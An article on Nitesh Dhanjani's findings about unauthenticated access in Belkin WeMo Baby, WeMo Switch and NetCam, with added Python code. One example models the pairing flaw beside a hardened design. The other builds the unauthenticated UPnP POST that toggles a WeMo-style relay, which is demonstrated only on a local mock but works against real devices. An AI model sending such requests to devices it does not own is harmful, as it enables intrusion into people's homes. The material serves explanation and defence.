A security researcher is fed up with insecure designs and takes Belkin to task for flaws in WeMo Switch, Wi-Fi NetCam and WeMo Baby.

When it comes to home automation, many people turn to Belkin WeMo because you can plug almost anything into the “smart” electrical switch and then remotely control it from a smartphone. As more people dive into the Internet of Things (IoT), with its “easy” and hackable home automation built on connected devices controlled by mobile phones, security researcher Nitesh Dhanjani presents “Reconsidering the Perimeter Security Argument” [pdf]. He highlights flaws in Belkin’s WeMo Switch, Wi-Fi NetCam and WeMo Baby, and demonstrates a “glaring design issue” in WeMo Baby that allows “anyone with one-time access to the local Wi-Fi where the monitor is installed” to later “listen in without authentication” and to “continue to listen in remotely.”

The Organization for Economic Co-operation and Development estimates, “By 2022, the average household with two teenage children will own roughly 50 Internet-connected devices, up from approximately 10 today.” Although estimates vary, the International Data Corporation expects “the installed base of the Internet of Things will be approximately 212 billion ‘things’ globally by the end of 2020. This will include 30.1 billion installed ‘connected (autonomous) things’ in 2020.”

Yet despite the positive aspects that home automation can bring us, Dhanjani states:

IoT device manufacturers should lay the foundation for a strong security architecture that is usable as well as not easily susceptible to other devices on the network. In these times, a compromised device on a home network can lead to the loss of financial information and personal information.
If IoT device vendors continue their approach of depending on the local home network and all other devices being completely secure, we will live in a world where a compromised device can result in gross remote violation of privacy and physical security of its customers.

WeMo Baby

Regarding the Belkin WeMo Baby, Dhanjani quoted an Amazon review by Lon Seidman:

…But that’s not the only issue plaguing this device. The other is a very poor security model that leaves the WeMo open to unwelcome monitoring. The WeMo allows any iOS device on your network to connect to it and listen in without a password. If that’s not bad enough, when an iPhone has connected once on the local network it can later tune into the monitor from anywhere in the world.

Dhanjani then demonstrated that flaw in a video. His proof-of-concept attack “turns a wireless baby monitor made by Belkin into a stealthy bugging device that can be accessed by someone in your front yard…or halfway around the world,” reported Ars Technica.

While it’s not the baby monitor cam hack that allowed a creep to spy on a toddler in her crib, Dhanjani also pointed out [pdf] that the Belkin Wi-Fi NetCam “lets users remotely view video from the camera.” The “NetCam password can be captured by local Wi-Fi users and by the internet service provider to obtain full blown remote access to the camera,” he wrote. “Once the attacker or botnet herder has collected the credentials,” then “he or she can spy on the victim using the Netcam app.”

WeMo Switch

Before presenting “Weaponizing your coffee pot” at DerbyCon, Daniel Buentello plugged a lamp into a WeMo Switch and made the relay click off and on so fast that it appeared as if the lamp might explode.
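The WeMo Baby problem Dhanjani and Seidman describe is a policy, not a bug in one line of code: being on the LAN once is treated as authorisation, and the credential handed out on that basis keeps working from anywhere, indefinitely. The Python below is an added model of that policy placed beside a hardened one; it is constructed for this page and is not Belkin’s firmware or app code, nor Dhanjani’s proof of concept. The subnet, the IP addresses, the printed pairing code and the client ids are assumed values, and binding a token to a client id stands in for what a real device would do with a per-client key and a signed request.

```python
"""Model of the WeMo Baby pairing flaw (one-time LAN presence gives permanent,
location-independent access) beside a hardened policy. Constructed for this
page; not Belkin's code."""
import ipaddress
import secrets
import time

LAN = ipaddress.ip_network("192.168.1.0/24")  # assumed home subnet


def on_lan(ip):
    return ipaddress.ip_address(ip) in LAN


class LanTrustingMonitor:
    """Vulnerable policy: any client that can reach the device on the LAN is
    'paired'; its token never expires, is not tied to the client, and is
    honoured no matter where the later request comes from."""

    def __init__(self):
        self.tokens = set()

    def pair(self, client_ip):
        if not on_lan(client_ip):
            return None
        tok = secrets.token_hex(16)
        self.tokens.add(tok)
        return tok

    def stream(self, token, client_ip):
        # No expiry, no origin check, no revocation: LAN access once is enough.
        return token in self.tokens


class PairedMonitor:
    """Hardened policy: pairing needs the code printed on the device (proof of
    physical access, not merely LAN access); tokens are bound to a client,
    expire, can be revoked, and work off-LAN only after the owner enables it."""

    TTL = 24 * 3600  # seconds; a real device would refresh rather than re-pair

    def __init__(self, printed_code, clock=time.time):
        self.printed_code = printed_code
        self.clock = clock
        self.tokens = {}             # token -> (client_id, expiry)
        self.remote_enabled = set()  # client ids the owner allowed off-LAN

    def pair(self, client_ip, client_id, code):
        if not on_lan(client_ip):
            return None  # pairing itself is a local-only operation
        if not secrets.compare_digest(code, self.printed_code):
            return None
        tok = secrets.token_hex(16)
        self.tokens[tok] = (client_id, self.clock() + self.TTL)
        return tok

    def enable_remote(self, client_id):
        self.remote_enabled.add(client_id)

    def revoke(self, client_id):
        self.tokens = {t: v for t, v in self.tokens.items() if v[0] != client_id}
        self.remote_enabled.discard(client_id)

    def stream(self, token, client_ip, client_id):
        entry = self.tokens.get(token)
        if entry is None:
            return False
        owner, expiry = entry
        if owner != client_id or self.clock() > expiry:
            return False
        if not on_lan(client_ip) and client_id not in self.remote_enabled:
            return False
        return True


def run_scenario():
    """Constructed timeline: a guest gets one-time LAN access, then tries to
    listen in from the internet a week later. Outcomes under both policies."""
    now = [1_700_000_000]  # fake clock, seconds
    clock = lambda: now[0]
    guest_lan, guest_remote = "192.168.1.77", "203.0.113.7"
    owner_lan, owner_remote = "192.168.1.10", "198.51.100.4"

    weak = LanTrustingMonitor()
    guest_tok = weak.pair(guest_lan)  # no secret needed: LAN presence suffices
    now[0] += 7 * 86400
    weak_guest_remote = weak.stream(guest_tok, guest_remote)

    strong = PairedMonitor(printed_code="4827-1934", clock=clock)
    guest_tok2 = strong.pair(guest_lan, "guest-phone", "0000-0000")  # wrong code
    owner_tok = strong.pair(owner_lan, "owner-phone", "4827-1934")
    strong.enable_remote("owner-phone")
    owner_remote_ok = strong.stream(owner_tok, owner_remote, "owner-phone")
    stolen_ok = strong.stream(owner_tok, guest_remote, "guest-phone")  # wrong client
    now[0] += PairedMonitor.TTL + 1
    expired_ok = strong.stream(owner_tok, owner_lan, "owner-phone")
    return {
        "weak_guest_remote": weak_guest_remote,     # the flaw: True
        "strong_guest_paired": guest_tok2 is not None,
        "strong_owner_remote": owner_remote_ok,
        "strong_stolen_token": stolen_ok,
        "strong_after_expiry": expired_ok,
    }


if __name__ == "__main__":
    for name, outcome in run_scenario().items():
        print(f"{name}: {outcome}")
```

The vulnerable class is the whole of Seidman’s complaint: pair() accepts anyone on the subnet, and stream() never asks where the request comes from or how old the token is. The hardened class moves the trust decision off the network and onto something only the owner has (the printed code), and makes remote use an explicit, revocable opt-in rather than a side effect of having once been on the Wi-Fi.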
Dhanjani also took issue with the WeMo Switch in his paper [pdf]: “Similar to the situation in WeMo Baby, malware on the local network can easily turn devices on the WeMo Switch on or off by directly invoking a POST request.”

After pointing users toward Issac Kelly’s GitHub code for an example, Dhanjani wrote, “Also similar to WeMo Baby, the malware script can obtain remote access and ship the authorized token to an attacker remotely. In this scenario a potential botnet herder can easily gain remote access to multiple WeMo switches in homes where his or her malware has been deployed.”

Dhanjani concluded, “As seen by the detailed illustrations in the above examples, we cannot secure our future by asserting that IoT devices and supporting applications have no responsibility for protecting the user’s privacy and security beyond requiring the user to set up a strong Wi-Fi password.”
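Dhanjani’s point that malware on the LAN can flip the WeMo Switch “by directly invoking a POST request” is easiest to see in code. The following is an added example, not the article’s, Belkin’s or Issac Kelly’s code: it builds the UPnP SOAP request a WeMo-style switch accepts and exercises it against a small mock relay on localhost so that it runs offline. The service URN urn:Belkin:service:basicevent:1, the control path /upnp/control/basicevent1, the port and the SetBinaryState/GetBinaryState actions are assumed here as the values the WeMo UPnP service exposes; they are not taken from the article.

```python
"""Unauthenticated UPnP control of a WeMo-style switch, the local POST Dhanjani
describes, exercised against an in-process mock. Added example; the UPnP
identifiers below are assumptions about the device, not taken from the article."""
import re
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

SERVICE = "urn:Belkin:service:basicevent:1"   # assumed WeMo service URN
CONTROL_PATH = "/upnp/control/basicevent1"    # assumed control URL path

SOAP_TEMPLATE = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    '<s:Body><u:{action} xmlns:u="{service}">{args}</u:{action}></s:Body>'
    "</s:Envelope>"
)


def build_request(host, port, action, **args):
    """Return (url, headers, body) for a UPnP SOAP action. Note what is absent:
    no credential, no session, nothing that ties the caller to the owner."""
    xml_args = "".join(f"<{k}>{v}</{k}>" for k, v in args.items())
    body = SOAP_TEMPLATE.format(action=action, service=SERVICE, args=xml_args)
    headers = {
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPACTION": f'"{SERVICE}#{action}"',
    }
    return f"http://{host}:{port}{CONTROL_PATH}", headers, body.encode()


def send(host, port, action, **args):
    """POST the action and return the raw SOAP reply."""
    url, headers, body = build_request(host, port, action, **args)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode()


def parse_binary_state(xml):
    m = re.search(r"<BinaryState>(\d)</BinaryState>", xml)
    return int(m.group(1)) if m else None


class MockSwitch(BaseHTTPRequestHandler):
    """Constructed stand-in for the relay: any well-formed SOAP action that
    reaches the control port is honoured, which is the whole problem."""
    state = 0

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0))).decode()
        action = self.headers.get("SOAPACTION", "").strip('"').split("#")[-1]
        if action == "SetBinaryState":
            MockSwitch.state = parse_binary_state(body)
        elif action != "GetBinaryState":
            self.send_error(400)
            return
        reply = (f'<s:Envelope><s:Body><u:{action}Response xmlns:u="{SERVICE}">'
                 f"<BinaryState>{MockSwitch.state}</BinaryState>"
                 f"</u:{action}Response></s:Body></s:Envelope>").encode()
        self.send_response(200)
        self.send_header("Content-Type", 'text/xml; charset="utf-8"')
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args):  # keep the demo quiet
        pass


def demo_local_roundtrip():
    """Start the mock on an ephemeral localhost port, flip the relay on, off,
    on again, and return the state read back after each write."""
    srv = HTTPServer(("127.0.0.1", 0), MockSwitch)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    host, port = srv.server_address
    try:
        seen = []
        for want in (1, 0, 1):
            send(host, port, "SetBinaryState", BinaryState=want)
            seen.append(parse_binary_state(send(host, port, "GetBinaryState")))
        return seen
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("relay states observed:", demo_local_roundtrip())
```

Nothing in the request identifies the caller, so the only thing standing between an attacker and the relay is reachability of the control port, and a phone, laptop or IoT device already on the Wi-Fi has that. The mock exists only so the round trip can be exercised without hardware; the request-building half is what a script on the LAN would send to a real device.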